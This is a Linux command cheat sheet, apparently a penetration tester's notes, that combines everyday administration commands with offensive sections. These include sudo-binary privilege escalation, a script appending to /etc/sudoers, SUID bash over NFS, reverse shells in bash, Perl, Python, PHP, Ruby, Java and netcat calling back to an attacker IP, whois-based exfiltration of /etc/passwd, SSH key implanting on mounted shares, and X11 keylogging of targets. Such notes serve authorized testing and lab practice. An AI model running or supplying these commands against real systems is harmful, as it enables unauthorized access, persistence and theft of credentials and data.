Linux


# Base64

echo "lee:password123#" | base64                Encode
echo "bGVlOnBhc3N3b3JkMTIzIwo=" | base64 -d     Decode
------------------------------------------------------------------------------------------------------------------------------------------------------

# Boot time

update-rc.d <service> enable                    Enable a service at boot time
update-rc.d <service> disable                   Disable a service at boot time
------------------------------------------------------------------------------------------------------------------------------------------------------

# Compile

gcc test.c -o test                              Compile test
gcc -m32 test.c -o test                         Compile 32-bit code on a 64-bit box
chmod 755 test                                  Make the file executable
./test                                          Run the file
------------------------------------------------------------------------------------------------------------------------------------------------------

# Compression

tar -zcvf test.tar test                         Compress
gzip test
zip -9 test.zip test
zip -r test.zip test/

tar xvfj test.tar.bz2                           Extract
tar zxvf test.tar.gz
tar zxvf test.tar
gzip -d test.gz
unzip test.zip
zcat rockyou.txt.gz > rockyou.txt
------------------------------------------------------------------------------------------------------------------------------------------------------

# Copy Files (remotely)

scp file.txt user@<target IP>:/tmp/             Local to remote
scp -r user@<target IP>:/path/to/share .        Remote to local

- AWS
scp -i aws2.pem file.txt ec2-user@<target IP>:/tmp/                  Local to remote
scp -i aws2.pem -r ec2-user@<target IP>:/home/ec2-user/file.txt .    Remote to local

# Append File (remotely)

cat ~/.ssh/id_rsa.pub | ssh user@<target IP> 'cat >> .ssh/authorized_keys'
------------------------------------------------------------------------------------------------------------------------------------------------------

# Date & Time

timedatectl list-timezones                      List timezones
timedatectl set-timezone America/Chicago        Set timezone to Central Standard Time
date +"%a %b %d, %Y - %r %Z"                    Sun Nov 01, 2020 - 04:06:10 PM CST
------------------------------------------------------------------------------------------------------------------------------------------------------

# Docker

apt install docker.io
systemctl start docker
systemctl enable dockers
docker search web-dvwa                          Search for an image
docker pull vulnerables/web-dvwa                Install an image
docker run -p 80:80 vulnerables/web-dvwa        Start the service for a package
xdg-open localhost &

docker pull szsecurity/mutillidae
docker run -p 81:80 szsecurity/mutillidae
xdg-open localhost:81 &

docker pull szsecurity/webgoat
docker run -p 82:80 szsecurity/webgoat
xdg-open localhost:82/WebGoats &

docker pull raesene/bwapp
docker run -d -p 8080:80 raesene/bwapp
xdg-open localhost:8080 &
Default creds bee:bug

systemctl disable docker.service                Disable Docker at boot time
systemctl disable docker.socket
------------------------------------------------------------------------------------------------------------------------------------------------------

# Download Files

wget -O <local file name> <server>              Download files using the http or ftp protocol
curl -o <local file name> <server>              Transfer data to or from a server using a host of protocols, very versatile
axel -a -n 20 -o <local file name> <server>     Download accelerator from an http or ftp server through multiple connections
------------------------------------------------------------------------------------------------------------------------------------------------------

# File Permissions

t rwx rwx rwx	 type / owner / group / world
Type is directory (d) or file (-).

read     (r)  4
write    (w)  2
execute  (e)  1

chmod 755 test.sh                               Make a file executable
------------------------------------------------------------------------------------------------------------------------------------------------------

# File System

/etc/passwd                                     User accounts
/etc/shadow                                     Encrypted passwords
------------------------------------------------------------------------------------------------------------------------------------------------------

# File Transfer

python3 -m http.server 80                       Starts a web sever on port 80
curl 10.0.0.5/test.txt -o test.txt              Download a file
------------------------------------------------------------------------------------------------------------------------------------------------------

# Files & Directories

ls                                              List files in a directory
ls -l                                           Long form listing
ls -la                                          Long form listing with hidden files

cd ~                                            Change to the home directory
cd test                                         Change to the test directory
pwd                                             Print the current working directory

touch tmp                                       Create a file
mkdir tmp                                       Create a directory
mkdir -p tmp/{red,white,blue}                   Create a directory with 3 subdirectories

cat tmp                                         Show the contents of a file
more tmp                                        Show the contents of a file, a page at a time
                                                Space bar for the next page or 'q' to quit

ping targat.com > tmp                           Redirect output to a new file
ping target2.com >> tmp                         Appending output to an existing file
wc -m < tmp                                     Redirect STDIN from a file

cp tmp tmp2                                     Copy a file from one location to another
cp -r dir dir2                                  Copy a directory from one location to another
mv tmp tmp2                                     Rename or move tmp to tmp2
rm tmp                                          Delete a file
rm -rf test                                     Force delete the directory

ln -s /path/to/file /path/to/link               Create a symbolic link
------------------------------------------------------------------------------------------------------------------------------------------------------

# File Integrity

md5sum test.iso                                 MD5 hash
sha1sum test.iso                                SHA1 hash
sha256sum test.iso                              SHA256 hash
------------------------------------------------------------------------------------------------------------------------------------------------------

# Finding Files

locate file                                     Reads a database (locate.db) and shows the location of a file
updatedb                                        Updates the db of all file names on the system
which app                                       Path where the app is executed from

find / -name pass*                              Find all the files that start with pass
find / -name *pass                              Find all the files that end with pass

find / -user <user> 2>/dev/null                 All files owned by a particular user
find / -group <group> 2>/dev/null               All files owned by a particular group
------------------------------------------------------------------------------------------------------------------------------------------------------

# Installation

./configure                                     Install from source
make
make install

dpkg -i app.deb                                 Install Debian package
rpm -vhU app.rpm                                Install RPM package

dpkg-query -l                                   Installed packages

- CentOS
yum -y install $(cat file)                      Install packages listed in a file
yum list installed                              Show installed packages
yum update                                      Refresh package database and install updates
------------------------------------------------------------------------------------------------------------------------------------------------------

# Networking

dhclient                                        Request an IP address from the DHCP server
netstat -antpu                                  Listening ports, services and PIDs
route                                           Gateway
/etc/hostname                                   Hostname
/etc/network/interfaces                         Network interfaces
/var/lib/dhcp/dhclient.leases                   DHCP

/etc/resolv.conf                                DNS
search localdomain
nameserver 192.168.1.1

ifconfig                                        IP addresses to all network interfaces
ifconfig eth0 down                              Bring interface down
ifconfig eth0 up                                Bring interface up
ifconfig eth0 <IP> netmask <mask>               Set IP and netmask
route add default gw <IP> eth0                  Set gateway

ip addr                                         IP addresses to all network interfaces
ip addr flush <interface>
ip link set <interface> down                    Bring interface down
ip link set <interface> up                      Bring interface up

- Static IP address
route                                           Note the gateway IP address

/etc/network/interfaces
auto eth0
iface eth0 inet static
    address 192.168.1.5/24
    gateway 192.168.1.x                         Use the gateway IP from the route command above

systemctl restart networking.service            Restart networking

curl ifconfig.me                                Show external IP
------------------------------------------------------------------------------------------------------------------------------------------------------

# Privilege Escalation

- Enumeration
cat /etc/sysconfig/network                                 Hostname and domain name
ifconfig                                                   IP addresses to all network interfaces
route                                                      Gateway
cat /etc/resolv.conf                                       DNS
netstat -antp                                              Show ports that are listening
arp -e
cat /etc/issue                                             OS info
cat /proc/version                                          OS name
uname -a                                                   Kernel info
cat /sys/class/dmi/id/product_name                         Computer model
cat /etc/exports

- Search for exploits
searchsploit linux kernel ubuntu 16.04

- Search for passwords and keys
find / -name "*password*"
find / -name "id_rsa"

- Check for bad permissions
find / -perm -4000 2>/dev/null                             Binaries with the SUID bit set - run the file with permissions of its owner
find / -user root -perm -6000 -print 2>/dev/null           Binaries with the SGID bit set - run the file with permissions of the owner's group
find / -perm -1000 2>/dev/null                             Binaries with the sticky bit set - only the owner of a directory or a file can delete or rename

find / -perm -o+w -type f 2>/dev/null                      World-writeable files
find / -writable -type d 2>/dev/null                       World-writeable folders

find / -perm -o+x -type f 2>/dev/null                      World-executable files
find / -perm -o+x -type d 2>/dev/null                      World-executable folders
find / \( -perm -o+w -perm -o+x \) -type d 2>/dev/null     World-writeable & world-executable folders

- Enumeration scripts (suggested order)
wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
wget https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh
wget https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py
wget https://raw.githubusercontent.com/portcullislabs/enum4linux/master/enum4linux.pl
wget https://downloads.cisofy.com/lynis/lynis-3.0.4.tar.gz     cd lynis; ./lynis audit system

- sudoers
sudo -l                                                    Users with root permissions and binaries that can be ran with root privs
sudo su or sudo bash                                       If the current user is listed in the file, elevate privs to root

- Abusing binaries
sudo apache2 -f /etc/shadow                                A way to view a system file
sudo apt-get update -o APT::Update::Pre-Invoke::="/bin/bash -i"
sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
sudo apt-get changelog apt                                 !/bin/sh then hit enter
sudo awk 'BEGIN {system("/bin/bash")}'
sudo ed                                                    !/bin/sh then hit enter
sudo env /bin/bash
sudo find /home -exec /bin/bash \;
sudo git help add                                          !/bin/sh then hit enter
touch tmp
find tmp -exec whoami \;                                   Find a file then execute a command
find tmp -exec netcat -lvp 443 -e /bin/sh \;

sudo ftp
! /bin/bash

sudo less /etc/passwd                                      !/bin/sh then hit enter
sudo man man                                               !/bin/sh then hit enter
sudo more /etc/passwd                                      !/bin/sh then hit enter
echo "os.execute('/bin/bash')" > test.nse && sudo nmap --script=test.nse
sudo perl -e 'exec "/bin/bash";'
sudo python -c 'import pty;pty.spawn("/bin/bash")'
sudo scp /etc/passwd lee@10.0.0.5:~/

socate file:`tty`,raw,echo=0 tcp-listen:443                Attack VM
sudo socat exec:'sh -li',pty,stderr,setsid,sigint,sane tcp:<attack IP>:443

sudo vi                                                    :!bash
sudo vi                                                    !/bin/sh then hit enter
sudo vi                                                    :set shell=/bin/bash:shell
sudo vi                                                    :shell

- Abusing the PATH variable
After escaping a restricted shell, export “/bin/bash” as a SHELL environment variable
and “/usr/bin” as a PATH environment variable so that we can run Linux commands properly.
export PATH=/bin:/usr/bin:$PATH
export SHELL=/bin/bash:$SHELL

- Add a user to the sudoers file
#!/usr/bin/env python
import os
import sys
try:
    os.system('echo "lee ALL= (root) NOPASSWD: /usr/bin/apach2, /usr/bin/awk, /usr/bin/find" >> /etc/sudoers')
except:
    sys.exit()

- Cron jobs
crontab -l                                      Check for entries
ls -l /etc/cron*                                Scheduled cron jobs

What files are owned by a particular user, but are not present in their home directory?
What are the files present in the /home/user folder? Are there any hidden files and folders?
What groups does the user belong to?
------------------------------------------------------------------------------------------------------------------------------------------------------

# Processes

ps fawwwux                                      Show all running processes
ps -ef | grep root                              Processes running as root
ps -ef | grep -v root                           Processes running under another account besides root
top                                             Running processes, CPU and memory
kill -9 <PID>                                   Kill process ID
killall <service>                               Kill all processes named service
------------------------------------------------------------------------------------------------------------------------------------------------------

# Proxy

git config --global http.proxy http://proxy:port

Add to bottom of /root/.bashrc
export http_proxy=http://username:password@proxy:port
export https_proxy=https://username:password@proxy:port
------------------------------------------------------------------------------------------------------------------------------------------------------

# Python

pip3 install -r requirements.txt                Install required Python packages
apt install python3-<package>                   Install a particular Python package
apt upgrade python3-<package>                   Upgrade a particular Python package
------------------------------------------------------------------------------------------------------------------------------------------------------

# Redirecting

screen -S test
socat TCP4-LISTEN:443,fork TCP4:<remoteIP>:443
------------------------------------------------------------------------------------------------------------------------------------------------------

# Remote Desktop

rdesktop -u <username> -p <password> -g 1920×1080 10.0.0.10
rdesktop -u <username> -p <password> -g 85% 10.0.0.10

If Network Level Authentication is enabled:
xfreerdp /u:admin /p:password /v:10.0.0.10 </clipboard /drive:share,/tmp /port:3390 /size:1920x1080>
------------------------------------------------------------------------------------------------------------------------------------------------------

# Reverse shells

- Setup a local listener
nc -lvp 443			                       Setup a listen on the attack box

- Bash shell
bash -i >& /dev/tcp/10.0.0.10/443 0>&1

- Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.10/443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

- Netcat Linux
nc -e /bin/sh 10.0.0.10 443

- Netcat Windows
nc -e cmd.exe 10.0.0.10 443

- Netcat without -e flag
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.10 443 > /tmp/f

- Perl
perl -e 'use Socket;$i="10.0.0.10";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

- PHP
<?php exec('nc 10.0.0.10 443 -e /bin/bash') ?>

- Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.10",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

- Ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.10",443).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

- xterm
xterm -display 10.0.0.10:1                      target - it will connect back to you on TCP port 6001
Xnest :1                                        attacker - catch the incoming xterm, start an X-Server
xhost +<target IP>                              attacker - authorize the target to connect to you
------------------------------------------------------------------------------------------------------------------------------------------------------

# Screen

Allows session sharing where tmux does not.

screen -ls                                      List sessions
screen -S test                                  Start a new session named test
screen -d -m -S test                            Start a new session in detached mode named test

ctrl+a d                                        Detach from the current session
screen -r                                       Attach to the current session
screen -r <PID or name>                         Attach to a specific session
screen -x test                                  Attach to a session called 'test'
User 2: screen -x test                          A second user attaches to the same session, now both users can see the same thing on the screen

screen -X -S <PID or name> quit                 Kill a specific session
exit                                            Exit the session

-t title

ctrl+a "                                        List windows
ctrl+a c                                        Create a new window
ctrl+a shift+a                                  Rename the current window
ctrl+a 2                                        Switch to window 2 (by number)
ctrl+a n                                        Switch to the next window
ctrl+a p                                        Switch to the previous window

ctrl+a |                                        Split current region horizontally
ctrl+a shift+s                                  Split current region vertically
ctrl+a tab                                      Switch to the next region

ctrl+a shift+q                                  Close all regions but the current one
ctrl+a shift+x                                  Close the current region

ctrl+a esc                                      Use the up and down arrows or mouse to scroll
esc                                             Exit scrollback mode
------------------------------------------------------------------------------------------------------------------------------------------------------

# SMB

cd /etc/samba/
mv smb.conf smb.conf-old
vi smb.conf
[tools]
   comment = Testing SMB sharing
   path = /home/lee/share/
   browseable = yes
   read only = no
   guest ok = no

mkdir /home/lee/share/                          Create new directory to share
chmod -R 777 /home/lee/share                    Give Everyone access
service smbd start                              Start the SMB service
service nmbd start
service smbd status                             Check the status of the service
smbpasswd -a lee                                Add a user and set the password for the share
--------------------------------------------------------------------------------------------------------------------------------------------

# SSH

ssh-keygen                                      Create new keys
ssh-copy-id -i ~/.ssh/id_rsa.pub user@host      Copy new key to server

- Configure a non-standard port
vi  /etc/ssh/sshd_config
#Port 22                                        Uncomment and change the port number

- Service
systemctl start ssh                             Start ssh service
update-rc.d ssh enable                          Enable ssh at boot time

- Permissions
-rw-------  authorized_keys
-rw-------  aws.pem
-rw-------  config
-rw-------  id_rsa
-rw-r--r--  id_rsa.pub
-rw-------  identity_file
-rw-r--r--  known_hosts

ssh user@host                                   Standard connection
ssh user@host -p 2222                           Connect on a non-standard port
ssh user@host -i key                            Connect using an identity file

- Local port forwarding
ssh <gateway> -L <local port to listen>:<remote host>:<remote port>
ssh user@host -L 5900:localhost:5900

- Remote port forwarding
ssh <gateway> -R <remote port to bind>:<local host>:<local port>
ssh user@host -R 2222:localhost:22 -f -N
                                                -f   Force to background
                                                -N   Do not execute a remote command

- Dynamic port forwarding
ssh user@host -f -N -D 1080
                                                -D   Create a SOCKS tunnel
proxychains nmap <options>

Firefox Preferences > Advanced > Network > Settings > Manual proxy configuration
Remove everything for HTTP, SSL and FTP proxies and ports
SOCKS Host: 127.0.0.1   Port: 1080
Select SOCKS v5 and Remote DNS

- X11
/etc/ssh/ssh_config                             Edit the SSH config file on the server
ForwardX11 yes
/etc/ssh/sshd_config                            Edit the SSH config file on the server
X11Forwarding yes

systemctl restart sshd                          Restart the SSH service on the server
exit

ssh -X user@host -o "XAuthLocation=/opt/X11/bin/xauth"
xdg-open                                        Start a GUI app

Note: if using macOS as the client, install XQuartz.
------------------------------------------------------------------------------------------------------------------------------------------------------

# Startup Services

update-rc.d -f <service> <add/remove>

update-rc.d networking defaults
/etc/init.d/networking restart
------------------------------------------------------------------------------------------------------------------------------------------------------

# System

cal                                             Calendar
date                                            Date and time
df -h                                           Disk usage
du                                              Directory space usage
env                                             Environmental variables
fdisk -l                                        Partition table
finger <user>                                   Info about a user
free                                            Memory and swap usage
halt                                            Power off
/proc/cpuinfo                                   CPU info
/proc/meminfo                                   Memory info
reboot                                          Reboot
set                                             Environmental variables
uptime                                          Current uptime
------------------------------------------------------------------------------------------------------------------------------------------------------

# Terminal

ctrl + alt + t                                  Open a Terminal
ctrl + shift + t                                Open a new tab in Terminal
ctrl + a                                        Go to the beginning of the line
ctrl + l                                        Clear the screen
------------------------------------------------------------------------------------------------------------------------------------------------------

# tmux

tmux                                            Start a new session
tmux new -s <name>                              Start a new session with a specific name

tmux ls                                         List sessions
tmux a                                          Attach to the previous session
tmux a -t <name>                                Attach to a specific session name
ctrl+b %                                        Rename a session
ctrl+b d                                        Detach from the current session
exit                                            Exit the current session

ctrl+b w                                        List windows
ctrl+b c                                        Create a new window
ctrl+b ,                                        Rename the current window
ctrl+b x                                        Kill current window
ctrl+b                                          Select a windows
ctrl+b ""                                       Split the pane horizontally
ctrl+b %                                        Split the pane vertically
ctrl+b arrow key                                Switch between panes
ctrl+d                                          Close the pane

- Add file to home directory to remap prefix from b to c and other goodies.
https://github.com/hamvocke/dotfiles/blob/master/tmux/.tmux.conf
------------------------------------------------------------------------------------------------------------------------------------------------------

# Traffic Capture

tcpdump -lnni eth0 tcp
tcpdump -lnni eth0 port 22
tcpdump -lnni eth0 src 10.0.0.10
tcpdump -lnni eth0 dst 10.0.0.10
tcpdump -lnni eth0 'udp port 53'
tcpdump -lnni eth0 'tcp port 443'
tcpdump -lnni eth0 'dst 10.0.0.10 and dst port 443'
tcpdump -w out.pcap -s 65535  'udp port 53'
------------------------------------------------------------------------------------------------------------------------------------------------------

# Tunneling VNC over SSH

OS X (awsv)                                     ssh -i ~/.ssh/aws.pem ec2-user@host -L 5901:localhost:5901

Remote Kali                                     sudo -i
                                                vncserver -geometry 2560x1600

OS X                                            Applications > VNC Viewer: localhost:5901
                                                Enter a password twice, then No

Terminate on Remote Kali                        vncserver -kill :1
------------------------------------------------------------------------------------------------------------------------------------------------------

# Upgrade to a full TTY session

awk                                             awk 'BEGIN {system("/bin/bash")}'
find                                            find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
Lua                                             os.execute('/bin/sh')
nmap                                            !sh
nmap                                            --interactive
Perl                                            perl —e 'exec "/bin/bash";'
Perl                                            exec "/bin/sh";
Python                                          python -c 'import pty; pty.spawn("/bin/bash")'
Ruby                                            exec "/bin/sh"
sh                                              /bin/bash
Within IRB                                      exec "/bin/sh"
Within vi                                       :!bash
Within vi                                       :set shell=/bin/bash:shell
------------------------------------------------------------------------------------------------------------------------------------------------------

# User Accounts

whoami                                          Who are you logged in as
id                                              User and group ids
w                                               Users currently logged on
last                                            Last 10 users logged on

cat /etc/passwd                                 User accounts
cat /etc/shadow                                 Encrypted passwords

passwd                                          Change the current user's password
passwd <user>                                   Change another user's password

su                                              Switch to another user

- New user setup
useradd -m lee                                  Add new user, create home directory and set default shell
passwd lee                                      Set a password
usermod -aG sudo lee                            Add new user to the sudo group. Use wheel for CentOS.
su - lee                                        Switch to new user
ssh-keygen
cd .ssh/
vi authorized_keys                              Add your ssh key
chmod 600 authorized_keys                       Set permissions

userdel <user>                                  Delete user
userdel -r <user>                               Delete user and user's home directory

cat /etc/group                                  Groups
groupadd <group>                                Add new group
groupdel <group>                                Delete group
groupmod <group>                                Modify group
-----------------------------------------------------------------------------------------------------------------------------------------------------

# Video resolution

xrandr                                          Supported resolutions
xrandr -s <resolution>                          Set resolution
------------------------------------------------------------------------------------------------------------------------------------------------------

# vi

vi oldfile                                      Open an existing file
vi newfile                                      Create a new file

Modes                                           Command, Insert, Append and Replace

- Command mode
:set number                                     Turn on line numbers
:set nonumber                                   Turn off line numbers
dd                                              Delete the current line
yy                                              Copy the current line
p                                               Paste the clipboard contents
<esc> u                                         Undo

gg                                              Beginning of file
G                                               End of file
0                                               Beginning of line
$                                               End of line

Search
/                                               Search string
n                                               Next string
N                                               Previous string

Search and replace
:%s/foo/bar/g                                   Search for foo and replace with bar globally

- Insert mode
Position the cursor where the new text should go.
i
Enter new text.
<esc> to return to command mode.

- Append mode
Position the cursor on the last letter of the line.
a
Enter new text. This adds text AFTER the cursor.
<esc> to return to command mode.

- Replace mode
Move the cursor to the character to be replaced.
r
Enter the replacement character.
<esc> to return to command mode.

<esc>                                           Quit
:q
<return>

<esc>                                           Force quit
:q!
<return>

<esc                                            Write changes
:w
<return>

<esc>                                           Write changes and quit
:wq
<return>
------------------------------------------------------------------------------------------------------------------------------------------------------

# whois Data Exfil

nc -lvp 43 | sed "s/ //g" | base64 -d                       Attacker
whois -h <attacker IP> -p 43 `cat /etc/passwd | base64`     Target

- additional method
rlogin -l "$(cat /etc/passwd)" -p port <target IP>
------------------------------------------------------------------------------------------------------------------------------------------------------

# Anonymous Mountable CIFS

mkdir /mnt/temp/
mount -t cifs -o username=user,domain=foo //<target IP>/share /mnt/temp

OS X: mount -t cifs //<target IP>:Users/<user> /mnt/temp/ -o user=<user>,pass=<password>,nounix,sec=ntlmssp

cat /root/.ssh/id_rsa.pub >> /tmp/mount/root/.ssh/authorized_keys
------------------------------------------------------------------------------------------------------------------------------------------------------

# Anonymous Mountable NFS

showmount -e <target IP>

apt-get install nfs-common
mkdir /mnt/temp/
mount -t nfs <target IP>:/<share> /mnt/temp/ -o nolock
cp /bin/bash .
chown root bash
chmod +s bash
ls -la bash
------------------------------------------------------------------------------------------------------------------------------------------------------

# Anonymous Mountable SMB

smbclient -L //<target IP>
smbclient //<target IP>/<share>
smb: \> ls
smb: \> cd <directory>
smb: \> cd "<long directory>"
smb: \> get <file>

mkdir /mnt/temp/
mount -t cifs //<target IP>/<share> /mnt/temp/ -o user=anonymous
------------------------------------------------------------------------------------------------------------------------------------------------------

# Rstatd enabled

rsysinfo <target IP>
------------------------------------------------------------------------------------------------------------------------------------------------------

# X11 Unauthenticated Access

- Enumeration
nmap -Pn -n -T4 --open -p6000-6009 <target IP>

- Gather window info
xwininfo -root -tree -display <target IP:display #>

- Capture screenshot
xwd -root -screen -silent -display <target IP:display #> > 1.xwd
convert 1.xwd 1.png

- Keylogger
xspy -display <target IP:display #>
If Kali's version doesnot work, you may need to compile from source https://github.com/mnp/xspy

- Remotely view
xwatchwin <target IP:display #> -w <ID>

- Remote Desktop
xrdp.py <target IP:display #>

- Reverse shell
xrdp.py <target IP:display #> –no-disp
It will prompt a new control pane where we can see the R-shell option.
nc -lvp 443
Go back to the window and enter the attackerIP:port, then select R-Shell.
